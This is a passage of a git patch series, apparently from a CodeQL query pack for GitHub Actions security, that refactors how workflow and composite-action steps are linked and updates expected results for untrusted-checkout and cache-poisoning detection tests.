https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs - */ -class Runs extends AstNode instanceof RunsImpl { - CompositeAction getAction() { result = super.getAction() } - - Step getAStep() { result = super.getAStep() } - - Step getStep(int i) { result = super.getStep(i) } -} - /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. @@ -213,12 +203,26 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } -class LocalJob extends Job instanceof LocalJobImpl { +abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { Step getAStep() { result = super.getAStep() } Step getStep(int i) { result = super.getStep(i) } } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends StepsContainer instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } +} + +/** + * An Actions job within a workflow which is composed of steps. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class LocalJob extends Job, StepsContainer instanceof LocalJobImpl { } + /** * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. @@ -230,6 +234,8 @@ class Step extends AstNode instanceof StepImpl { If getIf() { result = super.getIf() } + StepsContainer getContainer() { result = super.getContainer() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9416b39e1059..5c07a61e66e4 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -301,8 +301,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { result.getNode().getValue() = name } - LocalJobImpl getACaller() { - exists(LocalJobImpl caller, string gwf_path, string path | + LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } + + UsesStepImpl getACallerStep() { + exists(UsesStepImpl caller, string gwf_path, string path | // the workflow files may not be rooted in the parent directory of .github/workflows // extract the offset so we can remove it from the action path gwf_path = @@ -312,8 +314,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { .getRelativePath() .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getAStep().(UsesStepImpl).getCallee() = - path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and + caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and result = caller ) } @@ -327,7 +328,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { private predicate hasExplicitWritePermission() { // a calling job has an explicit write permission - this.getACaller().getPermissions().getAPermission().matches("%write") + this.getACallerJob().getPermissions().getAPermission().matches("%write") } /** Holds if the action is privileged. */ @@ -340,10 +341,10 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { or // there is a privileged caller job ( - this.getACaller().isPrivileged() + this.getACallerJob().isPrivileged() or - not this.getACaller().isPrivileged() and - this.getACaller().getATriggerEvent().isPrivileged() + not this.getACallerJob().isPrivileged() and + this.getACallerJob().getATriggerEvent().isPrivileged() ) } @@ -351,7 +352,7 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable exists(JobImpl caller, EventImpl event | - caller = this.getACaller() and + caller = this.getACallerJob() and event = caller.getATriggerEvent() and event.isExternallyTriggerable() and // the action is privileged @@ -433,33 +434,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { } } -class RunsImpl extends AstNodeImpl, TRunsNode { - YamlMapping n; - - RunsImpl() { this = TRunsNode(n) } - - override string toString() { result = n.toString() } - - override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - - override CompositeActionImpl getParentNode() { result.getAChildNode() = this } - - override string getAPrimaryQlClass() { result = "RunsImpl" } - - override Location getLocation() { result = n.getLocation() } - - override YamlMapping getNode() { result = n } - - /** Gets the action that this `runs` mapping is in. */ - CompositeActionImpl getAction() { result = this.getParentNode() } - - /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } - - /** Gets the step at the given index within this job. */ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } -} - class InputsImpl extends AstNodeImpl, TInputsNode { YamlMapping n; @@ -946,14 +920,57 @@ class JobImpl extends AstNodeImpl, TJobNode { } } -class LocalJobImpl extends JobImpl { +abstract class StepsContainerImpl extends AstNodeImpl { + /** Gets any steps that are defined within this job. */ + abstract StepImpl getAStep(); + + /** Gets the step at the given index within this job. */ + abstract StepImpl getStep(int i); +} + +class RunsImpl extends StepsContainerImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. */ + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } + + /** Gets the step at the given index within this job. */ + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } +} + +class LocalJobImpl extends JobImpl, StepsContainerImpl { LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } /** Gets any steps that are defined within this job. */ - StepImpl getAStep() { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) } + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - StepImpl getStep(int i) { result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) } + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } } class StepImpl extends AstNodeImpl, TStepNode { @@ -965,7 +982,10 @@ class StepImpl extends AstNodeImpl, TStepNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - override JobImpl getParentNode() { result.getAChildNode() = this } + override AstNodeImpl getParentNode() { + result.getAChildNode() = this and + (result instanceof LocalJobImpl or result instanceof RunsImpl) + } override string getAPrimaryQlClass() { result = "StepImpl" } @@ -981,12 +1001,37 @@ class StepImpl extends AstNodeImpl, TStepNode { /** Gets the value of the `if` field in this step, if any. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the Runs or LocalJob that this step is in. */ + StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() } + /** Gets a step that follows this step. */ StepImpl getAFollowingStep() { - exists(LocalJobImpl job, int i, int j | - job.getStep(i) = this and - result = job.getStep(j) and - i < j + ( + // next step in the same job + exists(LocalJobImpl job, int i, int j | + job.getStep(i) = this and + result = job.getStep(j) and + i < j + ) + or + // next steps in a composite action + exists(RunsImpl runs, int i, int j | + exists(this.getEnclosingCompositeAction()) and + runs.getStep(i) = this and + result = runs.getStep(j) and + i < j + ) + or + // next steps of the caller (in a composite action step) + result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() + or + // if any of the next steps is a call to a local composite actions, we should follow it + exists(LocalJobImpl job, int i, int j, CompositeActionImpl a | + job.getStep(i) = this and + i < j and + a.getACallerStep() = job.getStep(j) and + result = a.getRuns().getAStep() + ) ) } } From 44911382afd952d5052184e8ac552cb5446b1852 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 23:49:05 +0200 Subject: [PATCH 415/707] feat(tests): Update tests results --- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ce6d75bf1132..60f3370f6d17 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -365,5 +365,6 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From c1d8ca09768247604b16f342fb630ee7aa2319d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 00:01:49 +0200 Subject: [PATCH 416/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4b237b4bfd3c..f5cf222d25c7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.19 +version: 0.1.20 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4d522db3f98a..6def1dfc0c82 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.19 +version: 0.1.20 groups: [actions, queries] suites: codeql-suites extractor: javascript From cc64c95dbc498be84227bf27126600a9600f3416 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:28:47 +0200 Subject: [PATCH 417/707] feat(dataflow): Update edges predicate to only link to next step Previously each step was linking to all possible following steps. This change makes a better flow path explanation flowing from the checkout to the poisonable step, step by step --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 52 +++-- ql/src/Security/CWE-349/CachePoisoning.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 2 +- .../Security/CWE-349/CachePoisoning.expected | 92 -------- .../UntrustedCheckoutTOCTOUCritical.expected | 5 - .../UntrustedCheckoutCritical.expected | 207 +----------------- 8 files changed, 42 insertions(+), 322 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5c6cdc141eed..23832b35bd59 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -236,6 +236,8 @@ class Step extends AstNode instanceof StepImpl { StepsContainer getContainer() { result = super.getContainer() } + Step getNextStep() { result = super.getNextStep() } + Step getAFollowingStep() { result = super.getAFollowingStep() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c07a61e66e4..e920a558c73e 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1002,23 +1002,43 @@ class StepImpl extends AstNodeImpl, TStepNode { IfImpl getIf() { result.getNode() = n.lookup("if") } /** Gets the Runs or LocalJob that this step is in. */ - StepsContainerImpl getContainer() { result.getNode() = n.getParentNode() } + StepsContainerImpl getContainer() { + result = this.getParentNode().(RunsImpl) or + result = this.getParentNode().(LocalJobImpl) + } + + StepImpl getNextStep() { + // if step is a uses step calling a local composite action, we should follow the called step + this instanceof UsesStepImpl and + exists(CompositeActionImpl a | + a.getACallerStep() = this and + result = a.getRuns().getStep(0) + ) + or + // if step is the last step in a composite action, we should follow the next step in the caller + exists(RunsImpl runs, StepsContainerImpl caller_container, StepImpl caller, int i | + this.getContainer() = runs and + runs.getStep(count(StepImpl s | runs.getAStep() = s | s) - 1) = this and + runs.getEnclosingCompositeAction().getACallerStep() = caller and + caller.getContainer() = caller_container and + caller_container.getStep(i) = caller and + caller_container.getStep(i + 1) = result + ) + or + // next step in the same job/runs + exists(int i | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(i + 1) + ) + } /** Gets a step that follows this step. */ StepImpl getAFollowingStep() { ( - // next step in the same job - exists(LocalJobImpl job, int i, int j | - job.getStep(i) = this and - result = job.getStep(j) and - i < j - ) - or - // next steps in a composite action - exists(RunsImpl runs, int i, int j | - exists(this.getEnclosingCompositeAction()) and - runs.getStep(i) = this and - result = runs.getStep(j) and + // next steps in the same job/runs + exists(int i, int j | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(j) and i < j ) or @@ -1026,10 +1046,10 @@ class StepImpl extends AstNodeImpl, TStepNode { result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() or // if any of the next steps is a call to a local composite actions, we should follow it - exists(LocalJobImpl job, int i, int j, CompositeActionImpl a | - job.getStep(i) = this and + exists(int i, int j, CompositeActionImpl a | + this.getContainer().getStep(i) = this and + this.getContainer().getStep(j) = a.getACallerStep() and i < j and - a.getACallerStep() = job.getStep(j) and result = a.getRuns().getAStep() ) ) diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 607a13e142c0..3b69110ed129 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -17,7 +17,7 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 2656b22e1e31..a97309ce187b 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -16,7 +16,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 02054ebbf0ab..2026a784d055 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -18,7 +18,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } +query predicate edges(Step a, Step b) { a.getNextStep() = b } from PRHeadCheckoutStep checkout, PoisonableStep s where diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index eb1412bf0e28..994beb3b74f5 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -1,159 +1,67 @@ edges | .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:40:7:41:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | -| .github/workflows/poc3.yml:41:7:42:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc3.yml:42:7:43:4 | Run Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:36:9:38:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:38:9:43:6 | Uses Step | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/poc.yml:38:9:43:6 | Uses Step | .github/workflows/poc.yml:43:9:47:2 | Uses Step | | .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | | .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | -| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | | .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | -| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | | .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | -| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | | .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | -| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | | .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | -| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | | .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | | .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | -| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | | .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | -| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | -| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | | .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | -| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | -| 